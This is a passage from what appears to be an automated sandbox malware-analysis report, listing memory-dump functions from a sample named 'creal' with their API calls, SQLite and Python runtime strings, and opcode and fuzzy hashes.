                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                • Opcode ID: 032ea81c99ec7a83fc9ed446e6799de4a32a2fdf75c6d93fa13489cf3ba9ce95
                                                                                                                                                                                                                • Instruction ID: 160048b999e806daf39d306f71cb4bb7997147ef0df51e370707708fe9386143
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 032ea81c99ec7a83fc9ed446e6799de4a32a2fdf75c6d93fa13489cf3ba9ce95
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E10104A6E09B8381FB199FD5E84537C22A2AF44BE5F444035C92D076A0DF7DB6859303
                                                                                                                                                                                                                Function 00007FF8E71535F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_Vectorcall
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 1057673266-217463007
                                                                                                                                                                                                                • Opcode ID: d65abae93356dae59a4a840aaf2a40b004717b6640a575e0a43327181c576cc2
                                                                                                                                                                                                                • Instruction ID: bb9af0f66290cd9327bb71c826c8be15a3cc82bde680a81b9e65c7f4df82256e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d65abae93356dae59a4a840aaf2a40b004717b6640a575e0a43327181c576cc2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F08C36F097D282E7699F91F8413BD6362AB40FE4F848035CE5907A50EE2CA6858742
                                                                                                                                                                                                                Function 00007FF8E7144A30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$DeallocErr_$ArgsAttrCallInstanceObjectOccurred
                                                                                                                                                                                                                • String ID: ratio
                                                                                                                                                                                                                • API String ID: 1598006454-4234197119
                                                                                                                                                                                                                • Opcode ID: 35d559fc8b1310c0c6a435b23598347e2ea6a62b98f84bba43c18296abc6ca69
                                                                                                                                                                                                                • Instruction ID: 16e745d14306e2eec26c37d21a7cec7b2da050420f44a2dc1be26f91b8c4375a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35d559fc8b1310c0c6a435b23598347e2ea6a62b98f84bba43c18296abc6ca69
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5601C926E09B87C1FB595BE1E84537D23A1AF48BD4F185435CD2E06291EE7CF1858707
                                                                                                                                                                                                                Function 00007FF8E7143800 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Format
                                                                                                                                                                                                                • String ID: %s object expected; and errored formatting real type!$%s object expected; got %U
                                                                                                                                                                                                                • API String ID: 376477240-2630277986
                                                                                                                                                                                                                • Opcode ID: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
                                                                                                                                                                                                                • Instruction ID: 29439ad72400e9b2358bf58f5cc8fd729dc1ffc8ba5d1441bba1760452fafb00
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F04921E08B82C1EA094BA6F98437C6362FF48BD4F885031DA2D47695EE6CE5809702
                                                                                                                                                                                                                Function 00007FF8E715306B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                • Opcode ID: 6d3c8ef61b1ce4c915580a507c35e2098bc8d2d339069acd415264474d36893f
                                                                                                                                                                                                                • Instruction ID: 3e34a58fcc9c070466c7f603fb39cb1497a76877594dfa51891d74f802405fd5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d3c8ef61b1ce4c915580a507c35e2098bc8d2d339069acd415264474d36893f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBF01266E0DB8381FA1D5FD4E88537D6262AF00BE5F444038CA2D0B692EE6DA5899353
                                                                                                                                                                                                                Function 00007FF8E68CEB50 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 380COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF8E68CEBA2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 1475443563-3418467682
                                                                                                                                                                                                                • Opcode ID: 409bf4b4490d964f91b512375946b67e65f21b136b0b9dda1bf3d0e7d8408f83
                                                                                                                                                                                                                • Instruction ID: a396df7c4eec24c6f7fe22a4e0f65d2f7e3420ce571665ee1af01a76379da4d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 409bf4b4490d964f91b512375946b67e65f21b136b0b9dda1bf3d0e7d8408f83
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53F18C72B24662ABEB24CBA9D1447AD37A1FB44B88B004135DF1DA7B84DF3CE815C742
                                                                                                                                                                                                                Function 00007FF8E6912940 Relevance: 6.3, APIs: 5, Instructions: 70COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                                • Opcode ID: a6ff5a15896b073320a7f3bf873fce0ddaf5a002a29690532f372a235447d205
                                                                                                                                                                                                                • Instruction ID: 3dfe36d4c601e505e4b93a2a0c0b0344bf1e2a2f8931a745e334fec0056578ad
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6ff5a15896b073320a7f3bf873fce0ddaf5a002a29690532f372a235447d205
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0621A266A2875283DA24AB56F5452BAB3A1FF44BC0B081135DBCE47F9ACF2CE050C301
                                                                                                                                                                                                                Function 00007FF8E68BEEA0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 249COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                                • API String ID: 2221118986-2815843928
                                                                                                                                                                                                                • Opcode ID: a290f675da4f5c5e107bcd1d9fb6af64acc55498ccbefba8e45b70411a0c5bd1
                                                                                                                                                                                                                • Instruction ID: ef12faefb4925283f2e8a70eda35f97e1711b5fbeb3018adefee41caf5af8c2e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a290f675da4f5c5e107bcd1d9fb6af64acc55498ccbefba8e45b70411a0c5bd1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AC1AD29F2DA5681FAA49FA1E45477833A0FF49BC0F085235DA6E436A1DF3CE845C302
                                                                                                                                                                                                                Function 00007FF8E6945730 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 244COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FF8E6945C02), ref: 00007FF8E69458DB
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FF8E6945C02), ref: 00007FF8E6945959
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FF8E6945C02), ref: 00007FF8E6945A4B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                • API String ID: 3510742995-2313493979
                                                                                                                                                                                                                • Opcode ID: fcb7b03342ee407144e78f7d7191d52dd4f031f97a82eb8e131f18d6bdbbf8d7
                                                                                                                                                                                                                • Instruction ID: 2e4937c4829c1dd3cafe5080d3d5185b439077c2daaf64ea6c81eaeb1d3f5306
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcb7b03342ee407144e78f7d7191d52dd4f031f97a82eb8e131f18d6bdbbf8d7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B19D62A28B8186EB20DF95D4843A977A1FB85FE4F498235DE6D07796DF3CE190C301
                                                                                                                                                                                                                Function 00007FF8E68D0920 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                • Opcode ID: 32bab25185db5cd73c33ce9707f9a1cf8e9a927a2b0a63cd242fbe127e798c5a
                                                                                                                                                                                                                • Instruction ID: f4f9b8dcd6af0a162bcd0c45226889a59ba800ca5777542f7363474d56a28885
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32bab25185db5cd73c33ce9707f9a1cf8e9a927a2b0a63cd242fbe127e798c5a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF817263B2C2E159E321DE64A0506BE3AD4E7117D1F05853AEFCA877C1EA3CD986D321
                                                                                                                                                                                                                Function 00007FF8E694D730 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 213COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: AND $<expr>$rowid
                                                                                                                                                                                                                • API String ID: 3510742995-4041574714
                                                                                                                                                                                                                • Opcode ID: 7a9dbc8726f448c68fb70c6213c80d26ac906cc5f071e5a49b2eede7385ef9bc
                                                                                                                                                                                                                • Instruction ID: a8fc3455140cba517938c1dd8fe1f11251ec11719941698de7c820d448b9936a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a9dbc8726f448c68fb70c6213c80d26ac906cc5f071e5a49b2eede7385ef9bc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09A1D17AB282468AEB18EF55D0D863837A1EF55BD4F185036DA0E47388DF3DE849C742
                                                                                                                                                                                                                Function 00007FF8E6937390 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 198COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                • API String ID: 0-1505470444
                                                                                                                                                                                                                • Opcode ID: e4f89ea7a6944ccff559c56623e0758bdc567d60555918777054569768464e1a
                                                                                                                                                                                                                • Instruction ID: 0f9fa3d8e673f40c4d595a526f97ed679ce036bee95dafb15c83582e0be8ba98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4f89ea7a6944ccff559c56623e0758bdc567d60555918777054569768464e1a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1919B22A18B8281EA20EBA5D4583A97BA4FB45BE4F544336DE7D4B7D1DF3CE441C302
                                                                                                                                                                                                                Function 00007FF8E69126B0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 183COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                • Opcode ID: 2a15476f6ce4917aef91bbeb1ce1033297b7700a1e315c72d6f8d0f4d69aee38
                                                                                                                                                                                                                • Instruction ID: 1a0cbcabcc81ee06adb0c296d82df85df0bd4cb5697fd0c7cf777707b7616577
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a15476f6ce4917aef91bbeb1ce1033297b7700a1e315c72d6f8d0f4d69aee38
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31614962B2858186DB15AFA4A4443BAB792FB40BE4F594336DE6D433D5DF3CD486C300
                                                                                                                                                                                                                Function 00007FF8E68EB506 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 150COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                • API String ID: 3510742995-2410398255
                                                                                                                                                                                                                • Opcode ID: fbb4dafd0a6be070e2d76bd2d42bef59fcfdb936f2f040c068530713021ab583
                                                                                                                                                                                                                • Instruction ID: ef509e0617127b30289d380e5ebc6c5a35bf7f739cb8643b1998f31e50472e00
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbb4dafd0a6be070e2d76bd2d42bef59fcfdb936f2f040c068530713021ab583
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E861D566B2C6A682E7209FA5D44037EAB60FF45BD4F150032EF8D17BA5DE3DE4018711
                                                                                                                                                                                                                Function 00007FF8E68CA110 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 139COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                • Opcode ID: 9fbdde885ac630e7bcdc771e6e602f6af576433065d3d436b03cd6e64e737253
                                                                                                                                                                                                                • Instruction ID: 4584731826a74aeccb851bf0da79d648dbcc9b763e18ad0c8cdb84ade6d0bca3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fbdde885ac630e7bcdc771e6e602f6af576433065d3d436b03cd6e64e737253
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD518B22B28BA2A6EB54CBA6E5547A973A4FB48BC4F144032DF4D43754EF3DE451C302
                                                                                                                                                                                                                Function 00007FF8E68B85B0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
